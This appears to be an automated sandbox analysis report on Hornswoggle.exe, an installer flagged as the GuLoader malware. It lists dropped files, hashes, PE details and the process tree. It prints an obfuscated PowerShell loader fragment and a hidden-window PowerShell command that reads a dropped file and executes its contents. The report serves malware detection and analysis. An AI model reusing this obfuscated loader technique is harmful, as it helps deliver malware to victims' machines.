Preview:	$Kriss=$Kommuneplanerne41;........$Unsavories = @'. Palimb.Weritel$DepictcTAmbulatiP atoonkUdeluk rSnigmoroWirrastn Poly.reGdskninsWic thieD essagdThioscil H.chmeeLagerbertheolep=Henvisn$ UnrobiSMegsna kRe rdain Luc lld AphasieLovover;Funo,is.ImplemefR ligiou NautrunOilfirecFugti htStopursi ankbgoFristiln .lvand OpthalmMRefluo eDeterg s BundgroProtestm Nons pe Por.pot VegetarArenaeraCenterblNonsph. Chilost(Messrs $Unspea n UtilizoScourytb,rugeril SlutbeeIberegnnSemisfeeEpoxiess TristfsKautskyeSlibnins retr,c,Masterm$ProposaHSennasceSnafue,s orderslandvsei kaardeaEnticemnIgnotebeHousebrr Snoo iaEludesskHovedbgkUpbuoyiaNoncommnRegierjtFistfigeGispmisr ydbaa)Glossol Fjerntr{Arthrop.Parlame.Paroque$Foreb mUUneditadIndustrf IshmaeoTaphulslKlassehdAlexiuseHexanitlAdjoinisSulphareGarantisYoyoern Smaabor(Unec ecOAg stcou OptagntO ttowelEmanatei Ibididg Bakerlg UvisneeGromatirScaleno Bayadee' Traile NonconsNRen ezvaEbriousiEscrodtlMyrmicasClavisumInjurie$ uturgr SemilumGCoctiona Detacwl For

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udfring53.lev

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	data
Category:	dropped
Size (bytes):	1592092
Entropy (8bit):	0.15888263670695008
Encrypted:	false
SSDEEP:	768:soeSIeBIi+CIHPx0zCnX4uXSmBKjtdYKffNFYu5bA+KNiyvYFxUT:G
MD5:	B4834640DF9710A3741E667024766F83
SHA1:	B392E116F95A0388B7D82C7BD453FD4B3AABE9B6
SHA-256:	9091FB5A1B166D03C61848505A440E8B33ACA701DE691D7E4EB8FBFE7379FCAF
SHA-512:	76396F26F236DE394EE3C2441073BF59107F61393E87D730CC70E989582361AACDAEA20E59EA49CC0F125FA6A8405823B17A5D24EC111391E83647FC3687F48C
Malicious:	false
Preview:	.s...................W.....................................................................................0.......................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................2...........................................................................................j.............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Ungallantness.kok

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	data
Category:	dropped
Size (bytes):	805283
Entropy (8bit):	0.1589716616809398
Encrypted:	false
SSDEEP:	768:nHrNCx0tE2B2CS9/Nq7r2Cr5WHOKjzQT:rt
MD5:	5ACF4982DBF490AD4AE83C7D1856E89C
SHA1:	66FE8A2B3323ED8CF74FBF6C681D0AA3496A6185
SHA-256:	9F10026E2214CA3C9C59A9AF9913C2EF9C01AC32EFB3A7DB3A2BEC568809904C
SHA-512:	B1BFB5A4FA9B1B7841254161F9347ADC44E3269D13AB7E703A2EC009B95844442E66312436835185E7779673C2E5553659BD85F4B141E5CF907EEE9198EC1F82
Malicious:	false
Preview:	...........................................................................................................................................................................................................................................................................................................................................................................J........\........................................................................................................................................................................................................................................................J..................................................................................M.................c.....................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Yaply50.txt

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.303174937960327
Encrypted:	false
SSDEEP:	12:JgWpd0rRenzLLJBl8PjZQbFXEExWTCD/u:SWcrknXlKjZA2ENDm
MD5:	C271D6423649C301105C8A2ECA25F9E4
SHA1:	CFAC3739C43482547D096C88670FA646FB62A56C
SHA-256:	E58319C2FCC8C30C70969BED761493AFD5B7F29D12FDBD1D96C0BBD93EFC6DB2
SHA-512:	B04BBDBA8AFB3D93D6E10C9EA838EC3B2D3798CB0F8C383C44329FA35B4F6E72B4023FB1A6ADAFE49AF258CD876A5BB0A019C742353936EB6C60601937EAF04D
Malicious:	false
Preview:	crioceras shepard vildfarelserne,lg udgangsvrdiers alkaloids misaimed rabiat skihejsers seashine,impeccancy brndbarestes maskalonges strandvaskers forsikringsaftalelov sportsvognes mirlitons studieegnethedens fontina sprawled..assiento iodizing ferslevs blowbacks mementoernes sinicizing ahura zonal nedkradsende omtydet..spermatin predisable sulphureity.autofermentation symbolry recepturerets,

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\skakpartiet.For

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	data
Category:	dropped
Size (bytes):	352914
Entropy (8bit):	7.591142336864356
Encrypted:	false
SSDEEP:	6144:wWkljC//F20yoadLYF6lt3BXBQmoo2zl3iWZqfrwDgNGxSk5loGs:wWkg/tbnsTltNBQ9okBin8DgNGAk5G
MD5:	DE544C52E90C1FA7AABB1A69DB241558
SHA1:	659B83361313AD06448126AFB88B3C2AA17535E5
SHA-256:	359A10DDC0197D90086CF74888395A1405DB03CF34FCF8C2EC98E381A21754CB
SHA-512:	36BBC114177068EC2D08ED7D5792C2CC55789A4B49EA84E4CDA426F02908FA2911EE203F9E259933E0E2EA3EC5D6717C8D847DAFFE26F09B7FA39D0EB9D2332B
Malicious:	false
Preview:	.m...............cc.... ..88..............***...................11...oo..\|\|\|\|................}}......\.....................K..........FFFFFFF....................y............99999999.....,.Q...........;..........-.......Z..h.JJJJJ..CC............____..EEEE...........I..............77... ...ee..s..g...ww..............8........w......s.................$$...............f...888.....................F.........................m..uuu..yy.......0.,...........SSS....q.........}}}.....o..k....X.....pp.......ee..~...!!..........................k.......I.......................g.....S.......GGG.......+++....D.........O....'.............#.w.................VVVVV............E......vv...............#....?............................................fff................u...?....''''............____...gg..gg......................N.q........WW...FF...........................................&&&&&..............VV...H......................................................II.8....G.7.....................llll

C:\Windows\Logs\SIH\SIH.20250102.083611.080.1.etl

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.164501354969416
Encrypted:	false
SSDEEP:	192:FhwLzzsoshs5sasksLsBsfsags9sXs7bXs1sQsE2s8JtWx:FiLzodSqzpAykm+87A2FE/8JtWx
MD5:	DD6F86DD45AF562809A0D13B35F6EAF4
SHA1:	88A5CC50F35DFF8BED8A0F530C5CD9363B3479F0
SHA-256:	CC54FC1B2FFE3C74756D529021180951AE80C983615EF81CB77C1692A8DB75DC
SHA-512:	83578511862C67030AD9A87B698721FC97DBF2F1EFEC6D80E23BDB17C3EF67B6CEEA3BA99A3BA0220B994FBB7D79B5F6ED9A0923EF5FA0F5FAB8B61429B4D69F
Malicious:	false
Preview:	....P...P.......................................P...!...............................P.........................eJ.......*a.]..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W.................I.]..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.0.2...0.8.3.6.1.1...0.8.0...1...e.t.l.......P.P.....P.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPCD1B.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	17126
Entropy (8bit):	7.3117215578334935
Encrypted:	false
SSDEEP:	192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
MD5:	1B6460EE0273E97C251F7A67F49ACDB4
SHA1:	4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
SHA-256:	3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
SHA-512:	3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
Malicious:	false
Preview:	MSCF............D................\|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM.........z.;......t.<.o..\|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A....H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0....H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	24490
Entropy (8bit):	7.629144636744632
Encrypted:	false
SSDEEP:	384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
MD5:	ACD24F781C0C8F48A0BD86A0E9F2A154
SHA1:	93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
SHA-256:	5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
SHA-512:	7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
Malicious:	false
Preview:	MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.\|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G...`-=.w....m..2y.....o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.\|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPD4A9.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	modified
Size (bytes):	19826
Entropy (8bit):	7.454351722487538
Encrypted:	false
SSDEEP:	384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
MD5:	455385A0D5098033A4C17F7B85593E6A
SHA1:	E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
SHA-256:	2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
SHA-512:	104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
Malicious:	false
Preview:	MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f\|..g.7..6..].7B..O..#d..]Ls.k..Le...2...&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,......1.:-....K.......M..;....(,.W.V(^_.....9.,`\|...9...>..R...2\|.\|5.r....n.y>wwU..5...0.J....H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	30005
Entropy (8bit):	7.7369400192915085
Encrypted:	false
SSDEEP:	768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
MD5:	4D7FE667BCB647FE9F2DA6FC8B95BDAE
SHA1:	B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
SHA-256:	BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
SHA-512:	DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
Malicious:	false
Preview:	MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.\|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.\|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N....5.R...,+...u.~VO...R-......H7..9........].K....]....tS~.LSi....T....3+........k......i.J.y...,.Y\|.N.t.LX.....zu..8......S7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.743560883175848
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Hornswoggle.exe
File size:	583'720 bytes
MD5:	46b874a16ba720eb5d39a0e7f9a87291
SHA1:	9bc00b5338a4fef7db170cb7a8d07dbe28bd416b
SHA256:	da2bc53b2715ed2d46c9ffdb184a3f926269e983981a266a7442b3e7ff6b584c
SHA512:	dbffdaac2240d083406d126e63c7a7804e015b677e60f62496933b0fd1caac63ba717133e411735f27ece20e862a500cf665efdbeae89e50e93c1eae079afdf5
SSDEEP:	12288:o93jlmCJYEmcj4GkV0JVLuFmbukNADu23MYlBFvZ4NP:o93jlf7JtTw6uRDu2MqjG
TLSH:	D4C4E094A5664521C29E0134A6A3791EC27C9FD622E6D112EA357E33FE34BADFF40343
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	1956767870707155

Static PE Info

General

Entrypoint:	0x40322b
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4f67aeda01a0484282e8c59006b0b352

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Germier, E=Eksklusivaftalerne@biconvexity.Bes, O=Germier, L=Les Mar\xeats, OU="Klunsers Divide ", S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	31/10/2024 11:30:46 31/10/2025 11:30:46
Subject Chain	CN=Germier, E=Eksklusivaftalerne@biconvexity.Bes, O=Germier, L=Les Mar\xeats, OU="Klunsers Divide ", S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	5E8953C033826C656D4DE7746A3A4265
Thumbprint SHA-1:	DB9BA3BBAC8393AF2B0218B6D984C99744409BC3
Thumbprint SHA-256:	FBBB97EA1EADF27AEC293BC0D71B5CDAFA4ABCA3754C018DE8EF40875CC0EA69
Serial:	3BBC98048B20CB63E413823AB2B2398302A4A9FE

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F888CD01543h
push ebx
call 00007F888CD044C9h
cmp eax, ebx
je 00007F888CD01539h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F888CD04445h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F888CD0151Dh
push ebp
push 00000009h
call 00007F888CD0449Ch
push 00000007h
call 00007F888CD04495h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007F888CD040BFh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007F888CD040ADh
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x1bec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8e0f8	0x730
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dc5	0x5e00	566b191b40fde4369ae73a05b57df1d2	False	0.6685089760638298	data	6.47110609300208	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	6389f916226544852e494114faf192ad	False	0.4271484375	data	5.0003960999706765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	72dcd89e8824ae186467be61797ed81e	False	0.6474609375	data	5.220595003364983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x14000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x38000	0x1bec0	0x1c000	3d561cd710712943d7c2ece81602a3e4	False	0.42149135044642855	data	5.782312893766128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x382f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.1945019519697149
RT_ICON	0x48b20	0x65dd	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9937109330060974
RT_ICON	0x4f100	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.35518672199170126
RT_ICON	0x516a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.43363039399624764
RT_ICON	0x52750	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.5209016393442623
RT_ICON	0x530d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.62677304964539
RT_DIALOG	0x53540	0x100	data	English	United States	0.5234375
RT_DIALOG	0x53640	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x53760	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x53828	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x53888	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x538e8	0x294	OpenPGP Secret Key	English	United States	0.5242424242424243
RT_MANIFEST	0x53b80	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 14:36:13.230031013 CET	1.1.1.1	192.168.2.5	0xab81	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 2, 2025 14:36:13.230031013 CET	1.1.1.1	192.168.2.5	0xab81	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 2, 2025 14:37:15.592061996 CET	1.1.1.1	192.168.2.5	0x1783	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 2, 2025 14:37:15.592061996 CET	1.1.1.1	192.168.2.5	0x1783	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	08:35:54
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\Hornswoggle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Hornswoggle.exe"
Imagebase:	0x400000
File size:	583'720 bytes
MD5 hash:	46B874A16BA720EB5D39A0E7F9A87291
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:35:54
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
Imagebase:	0xfb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.4497282813.000000000BB30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	08:35:54
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	08:36:11
Start date:	02/01/2025
Path:	C:\Windows\System32\SIHClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\sihclient.exe /cv 2NlF6XCJtk6pGjotHbf1og.0.2
Imagebase:	0x7ff7e9d90000
File size:	380'720 bytes
MD5 hash:	8BE47315BF30475EEECE8E39599E9273
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
